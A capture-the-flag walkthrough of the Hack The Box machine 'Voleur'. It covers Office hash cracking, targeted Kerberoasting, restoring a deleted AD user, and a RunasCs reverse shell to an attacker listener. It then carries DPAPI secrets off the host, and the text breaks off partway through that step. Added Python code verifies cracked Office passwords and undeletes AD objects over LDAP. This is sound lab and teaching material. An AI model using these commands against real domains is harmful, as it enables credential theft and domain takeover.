Summary
HTB Voleur is a Medium-difficulty Windows machine.
- Initial reconnaissance and access:
  - NTLM is disabled on the target, so we configured Kerberos on the attacking host before enumerating the network.
  - An exposed SMB share held a password-protected Excel file; extracting and cracking its hash gave us the credentials stored inside.
- AD privilege escalation:
  - We identified a service account holding WriteSPN over another account. A targeted Kerberoasting attack on that account yielded its password and remote (WinRM) access to the host.
- Account restoration and DPAPI decryption:
  - Abusing a group membership, we restored a previously deleted domain user.
  - With that user's password we decrypted a DPAPI-protected credential blob and recovered another user's credentials.
- Domain compromise:
  - We found the backup service account's SSH private key and used it to reach a Linux subsystem (WSL) listening on the non-standard port TCP/2222.
  - From that system we pulled backup copies of NTDS.dit, SYSTEM and SECURITY.
  - Finally we recovered the Administrator NT hash and obtained domain admin.
Initial Access and Reconnaissance
The box provides starting credentials: ryan.naylor / HollowOct31Nyt.
```
└─$ ports=$(sudo nmap -p- -sS -n --open -Pn --min-rate=1500 -T4 10.129.232.130 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
└─$ nmap -p$ports -Pn -sV -sC 10.129.232.130 -oA tcpDetailed
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 01:34 PST
Nmap scan report for voleur.htb (10.129.232.130)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-02 17:36:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
52851/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
52852/tcp open msrpc Microsoft Windows RPC
52853/tcp open msrpc Microsoft Windows RPC
52880/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-02T17:37:08
|_ start_date: N/A
|_clock-skew: 8h01m32s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.19 seconds
```
The port scan shows a typical Active Directory domain controller (DNS, Kerberos, LDAP, SMB, WinRM on 5985). Two things stand out: OpenSSH on 2222/tcp reporting an Ubuntu build on an otherwise Windows host, and the 8h01m32s clock skew reported by the host script, which will matter for Kerberos. The domain name is voleur.htb.
SMB (445)
We tried SMB with the provided account.
```
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt'
SMB 10.129.232.130 445 10.129.232.130 [*] x64 (name:10.129.232.130) (domain:10.129.232.130) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.232.130 445 10.129.232.130 [-] 10.129.232.130\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
```
`STATUS_NOT_SUPPORTED` here means the DC refuses NTLM authentication altogether (nxc's banner already says `NTLM:False`). nxc authenticates with NTLM by default, so the attempt is rejected before the password is even evaluated; we have to use Kerberos instead.
Before continuing, we pointed the attacking host at the DC: a hosts entry so the DC's name resolves, and a Kerberos client configuration in /etc/krb5.conf for the realm.
```
└─$ echo '10.129.232.130 DC.voleur.htb voleur.htb' | sudo tee -a /etc/hosts
10.129.232.130 DC.voleur.htb voleur.htb
```
/etc/krb5.conf is the Kerberos client's map: it tells the local machine which KDC serves a given realm and where to reach it. With dns_lookup_kdc disabled, the kdc line is what MIT Kerberos tools (klist, and evil-winrm's Kerberos authentication later on) use to find the DC.
```
└─$ cat /etc/krb5.conf
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_kdc = false
[realms]
VOLEUR.HTB = {
kdc = DC.voleur.htb
default_domain = vole​ur.htb
}
```
Now run the command again, this time with -k so nxc authenticates with Kerberos.
```
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [-] voleur.htb\ryan.naylor:HollowOct31Nyt KRB_AP_ERR_SKEW
```
`KRB_AP_ERR_SKEW` means our clock and the DC's disagree. Kerberos requests carry a timestamp, and to limit replay the KDC rejects anything whose timestamp differs from its own clock by more than the permitted skew (5 minutes by default). nmap already reported about 8 hours of skew, so we synchronise our clock with the DC:
```
└─$ sudo ntpdate -u DC.voleur.htb
2026-01-02 10:54:51.282829 (-0800) +28892.174075 +/- 0.107687 DC.voleur.htb 10.129.232.130 s1 no-leap
CLOCK: time stepped by 28892.174075
```
The step of 28892 s is the 8h01m32s nmap measured. Running the command once more:
```
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
```
SMB Shares
```
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
```
Besides the default shares, the IT share is readable; Finance and HR exist but grant this account no permissions. Let's see what IT contains.
```
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --spider IT --pattern .
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Started spidering
SMB dc.voleur.htb 445 dc [*] Spidering .
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/.. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/.. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/Access_Review.xlsx [lastm:'2025-05-29 15:23' size:16896]
SMB dc.voleur.htb 445 dc [*] Done spidering (Completed in 2.5153794288635254)
```
We found Access_Review.xlsx under First-Line Support; download it and take a look.
```
└─$ nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -d voleur.htb --share IT --get-file 'First-Line Support/Access_Review.xlsx' Access_Review.xlsx
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC [*] Copying "First-Line Support/Access_Review.xlsx" to "Access_Review.xlsx"
SMB DC.voleur.htb 445 DC [+] File "First-Line Support/Access_Review.xlsx" was downloaded to "Access_Review.xlsx"
└─$ file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
```
CDFV2 Encrypted is the compound-file container Office uses for password-protected documents, so the workbook is encrypted. office2john reads the encryption parameters and password verifier out of the file and prints them as a crackable hash; the `$office$*2013*` prefix with 100000 spin iterations corresponds to hashcat mode 9600 (MS Office 2013).
```
└─$ office2john Access_Review.xlsx | cut -d: -f2 > hash.txt
└─$ hashcat -m 9600 hash.txt /usr/share/wordlists/rockyou.txt
$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c:football1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*a80811402788c037b50df97...fa111c
Time.Started.....: Fri Jan 2 11:38:40 2026 (2 secs)
Time.Estimated...: Fri Jan 2 11:38:42 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 471 H/s (12.05ms) @ Accel:141 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 846/14344388 (0.01%)
Rejected.........: 0/846 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> xxxxxx
Hardware.Mon.#01.: Util: 90%
Started: Fri Jan 2 11:38:12 2026
Stopped: Fri Jan 2 11:38:44 2026
```
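As an added check that is not part of the original write-up, the Python below re-implements the verifier that hashcat mode 9600 attacks, so the `football1` result can be confirmed (or any other candidate tested) without hashcat. It parses the office2john string printed above, runs the MS-OFFCRYPTO agile key derivation (SHA-512 spun 100000 times, which is why hashcat only managed about 470 guesses per second), derives the two purpose-specific keys from the fixed block keys, decrypts the verifier with AES-256-CBC and compares hashes. It assumes the third-party `cryptography` package for AES; everything else is standard library, and the function names are this example's own.

```python
"""Verify a password against an office2john '$office$*2013*...' hash.

Added example, not from the original write-up: a stand-alone re-implementation
of the MS-OFFCRYPTO agile password verifier that hashcat mode 9600 attacks.
Assumes the third-party 'cryptography' package for AES-CBC.
"""
import hashlib
import struct

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# The hash office2john printed for Access_Review.xlsx on this page.
OFFICE_HASH = (
    "$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5"
    "*500bd7e833dffaa28772a49e987be35b"
    "*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c"
)

# Block keys from MS-OFFCRYPTO (password key encryptor): one per derived key.
BLOCK_KEY_VERIFIER_INPUT = bytes.fromhex("fea7d2763b4b9e79")
BLOCK_KEY_VERIFIER_HASH = bytes.fromhex("d7aa0f6d3061344e")


def parse_office_hash(text: str) -> dict:
    """Split '$office$*2013*spin*keyBits*saltSize*salt*encVerifier*encVerifierHash'."""
    parts = text.split("*")
    if len(parts) != 8 or parts[0] != "$office$" or parts[1] != "2013":
        raise ValueError("only the $office$*2013* (agile, SHA-512/AES-256) format is handled")
    fields = {
        "spin_count": int(parts[2]),
        "key_bits": int(parts[3]),
        "salt": bytes.fromhex(parts[5]),
        "enc_verifier_input": bytes.fromhex(parts[6]),
        "enc_verifier_hash": bytes.fromhex(parts[7]),
    }
    if len(fields["salt"]) != int(parts[4]):
        raise ValueError("salt length does not match the saltSize field")
    return fields


def spin_hash(password: str, salt: bytes, spin_count: int) -> bytes:
    """H_0 = SHA512(salt || UTF-16LE(password)); then H = SHA512(LE32(i) || H) for i in 0..spin-1.

    The spin count is the deliberate cost factor: every guess costs spin_count SHA-512s.
    """
    h = hashlib.sha512(salt + password.encode("utf-16-le")).digest()
    for i in range(spin_count):
        h = hashlib.sha512(struct.pack("<I", i) + h).digest()
    return h


def derive_key(final_hash: bytes, block_key: bytes, key_bits: int) -> bytes:
    """Purpose-specific key: SHA512(H_final || blockKey), truncated to keyBits/8 bytes."""
    return hashlib.sha512(final_hash + block_key).digest()[: key_bits // 8]


def aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    return decryptor.update(data) + decryptor.finalize()


def verify_office_password(text: str, password: str) -> bool:
    """True if 'password' opens the document whose verifier is encoded in 'text'."""
    f = parse_office_hash(text)
    final = spin_hash(password, f["salt"], f["spin_count"])
    iv = f["salt"]  # for the password key encryptor the IV is the salt itself
    verifier_input = aes_cbc_decrypt(
        derive_key(final, BLOCK_KEY_VERIFIER_INPUT, f["key_bits"]), iv, f["enc_verifier_input"])
    verifier_hash = aes_cbc_decrypt(
        derive_key(final, BLOCK_KEY_VERIFIER_HASH, f["key_bits"]), iv, f["enc_verifier_hash"])
    # office2john keeps only the first 32 bytes of the 64-byte encrypted hash. CBC lets
    # us decrypt that prefix on its own, so compare the same prefix of SHA512(input).
    expected = hashlib.sha512(verifier_input).digest()[: len(verifier_hash)]
    return expected == verifier_hash


if __name__ == "__main__":
    for candidate in ("football", "football1"):
        print(f"{candidate}: {verify_office_password(OFFICE_HASH, candidate)}")
```

A wrong password decrypts to random bytes and the comparison fails, so the function doubles as a minimal single-candidate cracker; the wordlist loop is what hashcat adds on top.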

We put the usernames and passwords from the spreadsheet into users.txt and passwords.txt and tried them over SMB with netexec (again with -k, and --continue-on-success so every combination is tested):
```
└─$ nxc smb DC.voleur.htb -u users.txt -p passwords.txt --continue-on-success -k
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
```
Two accounts are valid: svc_iis and svc_ldap. Next we collected BloodHound data to map what these accounts can do.
```
└─$ bloodhound-python -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -c all --zip -ns 10.129.232.130
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 00M 43S
INFO: Compressing output into 20260102133401_bloodhound.zip
```

In the BloodHound graph, svc_ldap holds WriteSPN over svc_winrm.
svc_ldap → svc_winrm
Attack steps
- With the account that has WriteSPN, write an arbitrary SPN (Service Principal Name) onto the target account.
- Once the SPN exists, any domain principal with a TGT can request a service ticket (TGS) for it; part of that ticket is encrypted with the target account's password-derived key.
- Crack the TGS offline.
- A successful crack yields the target account's plaintext password.
```
└─$ impacket-getTGT -dc-ip 10.129.232.130 voleur.htb/svc_ldap
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_ldap.ccache
└─$ export KRB5CCNAME=svc_ldap.ccache
└─$ klist
Ticket cache: FILE:svc_ldap.ccache
Default principal: svc_ldap@VOLEUR.HTB
Valid starting Expires Service principal
01/02/2026 13:46:19 01/02/2026 23:46:19 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 01/03/2026 13:46:19
```
With svc_ldap's TGT exported in KRB5CCNAME we run targetedKerberoast. For each account the caller can write to, it sets a temporary SPN, requests a TGS, prints it in hashcat format, and removes the SPN again. The target does not need an SPN beforehand; write access to its servicePrincipalName attribute (here, WriteSPN) is the only privilege required.
```
└─$ targetedKerberoast.py -d voleur.htb --dc-host DC.voleur.htb -u svc_ldap@voleur.htb -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$59a7b8fbab1efc52d43f2836029c93d2$...
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$d9020a994c399e37cd9b3090e6704d60$...
```
Hashes come back for svc_winrm and lacey.miller. Both are `$krb5tgs$23$` tickets, i.e. RC4-HMAC, the encryption type that is cheapest to crack.
Offline cracking
```
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$d9020a994c399e37cd9b3090e6704d60$...:AFireInsidedeOzarctica980219afi
```
That recovers svc_winrm:AFireInsidedeOzarctica980219afi.
```
└─$ impacket-getTGT -dc-ip 10.129.232.130 voleur.htb/svc_winrm
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_winrm.ccache
└─$ export KRB5CCNAME=svc_winrm.ccache
└─$ klist
Ticket cache: FILE:svc_winrm.ccache
Default principal: svc_winrm@VOLEUR.HTB
Valid starting Expires Service principal
01/02/2026 13:55:02 01/02/2026 23:55:02 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 01/03/2026 13:55:01
```

svc_winrm is a member of Remote Management Users, so WinRM is the obvious next step. With svc_winrm's ticket in KRB5CCNAME, evil-winrm authenticates with Kerberos (-r names the realm); as the warning says, the -u value is ignored in favour of the ticket.
```
└─$ evil-winrm -i DC.voleur.htb -r VOLEUR.HTB -u svc_winrm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm
```

Looking back at the BloodHound data, svc_ldap is a member of the Restore_Users group, which suggests it can restore deleted AD objects. We have svc_ldap's password but no shell as that user, so we upload RunasCs and run commands under svc_ldap from the svc_winrm session, starting with a listing of the Deleted Objects container:
```
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> upload RunasCs.exe
Info: Uploading /home/kali/Desktop/HTB/Voleur/RunasCs.exe to C:\Users\svc_winrm\Desktop\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADObject -Filter 'isDeleted -eq `$true' -IncludeDeletedObjects -Properties distinguishedName, objectSid -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb'"
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid : S-1-5-21-3927696377-1337352550-2781715495-1110
```
Todd Wolfe's account is indeed a tombstone in Deleted Objects. Note its objectGUID and its objectSid (RID 1110): the GUID addresses the object for the restore, and the SID is needed later for DPAPI. Now restore it.
```
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -c Get-ADObject -Filter 'ObjectGUID -eq ''1c6b1deb-c372-4cbb-87b1-15031de169db''' -IncludeDeletedObjects -Properties lastKnownParent" -l 8
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -c Get-ADUser -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db' -Properties *" -l 8
...
Deleted :
Department :
Description : Second-Line Support Technician
DisplayName : Todd Wolfe
DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
isDeleted :
KerberosEncryptionType : {}
...
```
The object now has a normal DN under its original OU (Second-Line Support Technicians) and isDeleted is no longer set: the account has been restored. The -l 8 flag makes RunasCs use logon type 8 (network cleartext), which the earlier warning recommended for a more capable token.
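The listing above shows the tombstone lookup and the post-restore check but not the restore call itself. As an added example that is not the author's code, here is what Restore-ADObject does on the wire. Per MS-ADTS 3.1.1.5.3.7 an undelete is a single LDAP Modify against the tombstone that deletes isDeleted and replaces distinguishedName with the new DN, sent with the Show Deleted Objects control (OID 1.2.840.113556.1.4.417) so the tombstone can be addressed at all. The DNs are the ones printed above; the network part assumes the third-party `ldap3` package and an LDAPS simple bind as svc_ldap, both assumptions of this example, and the DN helpers are pure functions.

```python
"""Undelete (reanimate) a tombstoned AD user over LDAP.

Added example, not part of the original write-up. This is the Modify that
Restore-ADObject issues (MS-ADTS 3.1.1.5.3.7): drop isDeleted, set the new
distinguishedName, and send the Show Deleted Objects control so the tombstone
is addressable. Network I/O assumes the third-party 'ldap3' package and an
LDAPS simple bind; the DN helpers are pure functions.
"""
SHOW_DELETED_OID = "1.2.840.113556.1.4.417"  # LDAP_SERVER_SHOW_DELETED_OID

# ldap3 exports exactly these string constants; they are redefined here so the
# helpers work without the package installed.
MODIFY_DELETE = "MODIFY_DELETE"
MODIFY_REPLACE = "MODIFY_REPLACE"

# AD renames a deleted object's RDN to '<name>' + newline (0x0A) + 'DEL:<objectGUID>';
# LDAP tools show the newline escaped as '\0A'.
DEL_MARKER = "\\0ADEL:"

# Values taken from the Get-ADObject / Get-ADUser output on this page.
DELETED_DN = ("CN=Todd Wolfe\\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,"
              "CN=Deleted Objects,DC=voleur,DC=htb")
LAST_KNOWN_PARENT = "OU=Second-Line Support Technicians,DC=voleur,DC=htb"


def split_tombstone_dn(deleted_dn: str) -> tuple:
    """Return (original RDN, objectGUID) from a tombstone DN."""
    idx = deleted_dn.find(DEL_MARKER)
    if idx < 0:
        raise ValueError("not a tombstone DN (no \\0ADEL: marker)")
    rdn = deleted_dn[:idx]
    guid = deleted_dn[idx + len(DEL_MARKER): idx + len(DEL_MARKER) + 36]
    return rdn, guid


def restored_dn(deleted_dn: str, last_known_parent: str) -> str:
    """The DN the object gets back: its original RDN under its lastKnownParent."""
    rdn, _ = split_tombstone_dn(deleted_dn)
    return f"{rdn},{last_known_parent}"


def undelete_changes(new_dn: str) -> dict:
    """The two attribute changes that make up an undelete Modify (ldap3 'changes' shape)."""
    return {
        "isDeleted": [(MODIFY_DELETE, [])],
        "distinguishedName": [(MODIFY_REPLACE, [new_dn])],
    }


def undelete(dc_host: str, bind_upn: str, password: str,
             deleted_dn: str, last_known_parent: str) -> str:
    """Send the undelete; return the new DN or raise with the DC's diagnostic.

    The caller needs the Reanimate Tombstones control access right on the naming
    context (what a 'restore users' delegation typically grants) plus write access
    to the target container; otherwise the DC answers insufficientAccessRights.
    """
    import ldap3  # local import: the pure helpers above do not need it

    new_dn = restored_dn(deleted_dn, last_known_parent)
    server = ldap3.Server(dc_host, port=636, use_ssl=True)
    conn = ldap3.Connection(server, user=bind_upn, password=password, auto_bind=True)
    ok = conn.modify(deleted_dn, undelete_changes(new_dn),
                     controls=[(SHOW_DELETED_OID, True, None)])
    result = conn.result
    conn.unbind()
    if not ok:
        raise RuntimeError(f"undelete failed: {result}")
    return new_dn


if __name__ == "__main__":
    print("would restore to:", restored_dn(DELETED_DN, LAST_KNOWN_PARENT))
    # undelete("DC.voleur.htb", "svc_ldap@voleur.htb", "<password>", DELETED_DN, LAST_KNOWN_PARENT)
```

Restoring to lastKnownParent is what Restore-ADObject does by default; any other parent works as long as the caller may create the object there. Attributes stripped at deletion (those not on the tombstone's preserved list) are not brought back, which is why the Get-ADUser output above shows several blank fields.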
Shell
```
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell -r 10.10.14.13:4444
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58d39b$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4240 created in background.
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.129.232.130] 51230
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
```
todd.wolfe is a member of the Second-Line Support Technicians group.
Lateral Movement (todd.wolfe → jeremy.combs)
Windows keeps saved credentials (Credential Manager entries) encrypted under AppData\Roaming\Microsoft\Credentials. An archived copy of todd.wolfe's profile lives on the IT share, and it contains one such blob:
```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials> dir
dir
Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 4:55 AM 398 772275FAD58525253490A9B0039791D3
```
DPAPI (Data Protection API) is the encryption facility built into Windows that protects these blobs. Decrypting one offline needs two files:
- Master key
  - Location: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\
  - File name: a UUID
- Credential file
  - Location: C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
  - File name: a 32-character hex string
The credential blob is encrypted with the master key, and the master key file is itself encrypted with a key derived from the user's logon password and SID. That is why todd.wolfe's password matters here: impacket's dpapi masterkey derives the same key from -password and -sid.
```
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110> [Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\08949382-134f-4c63-b93c-ce52efc0aa88"))
[Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\08949382-134f-4c63-b93c-ce52efc0aa88"))
AgAAAAAAAAAAAAAAMAA4ADkANAA5ADMAOAAyAC0AMQAzADQAZgAtADQAYwA2ADMALQBiADkAMwBjAC0AYwBlADUAMgBlAGYAYwAwAGEAYQA4ADgAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAASAWcret5vHz2ZFDJGrnZI1BGAAAJgAAAA2YAAANcj1B/jylUhNcSe+UibSS+B7/bdiHKg/fYSD6cibplaMd3Y4zsjKqsVTKcNtLlcdFUHq1DuFNs3RIWP+bmweMuDU8cufImoeLTlQpIYdMh+W9gPmEl8K4uE7aQE3Yw5XcATlxytrmIAgAAAB7vnBVPlWNLbxgEAtZNEf5QRgAACYAAAANmAABK1OOpu3KshUr3dLNdcY8yUp0/QCvW9RyADda8JEaf/e2Qbn8XnQuQPb/7LENveEXSO4R2DsxXLXCs4ban1JazinCCqkvrWW0CAAAAAAEAAFgAAACEizqYyco/TqsQ3rgf7i9DSOaEVnONX4KQQG5p9lFlW0/lt1Tnj0do7kUF1rtUFAHLJCLhNsUpKRlyquQSSM0FnaIPoACBXWAUQ8P1KLfVosXGHH5zx9BwP8S+SjguDL3ipMNTWgTbAxzMB6wei02C/GjW4TTqZz6d/ENfJi79Quwp48np4xmtDOMKfNBKdPGdHIBSeJBJ90SpBN/sFHoveguRpfGmcJVpE4P/2yZWHcHSlTXxx1bF2GR/N32eLVzlDW8U0jiqZXz+GAxZPJcXVZzcwJCnQ86b5WV9YBrXq3d5gyGPGWgx3cryZPMR+03CQtT41lxN4CfgfD59crbmN5sMZCp6KG5RyRs3J1k0BXwLy8Ri33WwYhOUCCi9pSj1y3vvwqmAV4v1UydH0PXPlH+39e2oB2487UTGGdlyaQgs0YW7H5gWzc92ZrcTK1TXBO6ln7meBvmkT1RuqEZHHTpfWoKJFHs=
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials> [Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\772275FAD58525253490A9B0039791D3"))
[Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\772275FAD58525253490A9B0039791D3"))
...
```
Both files are carried over to the attacking machine as base64 and decoded there (the credential blob's base64 is not reproduced here):
```
└─$ echo '...' | base64 -d > cred.bin
└─$ echo '...' | base64 -d > masterkey.bin
```
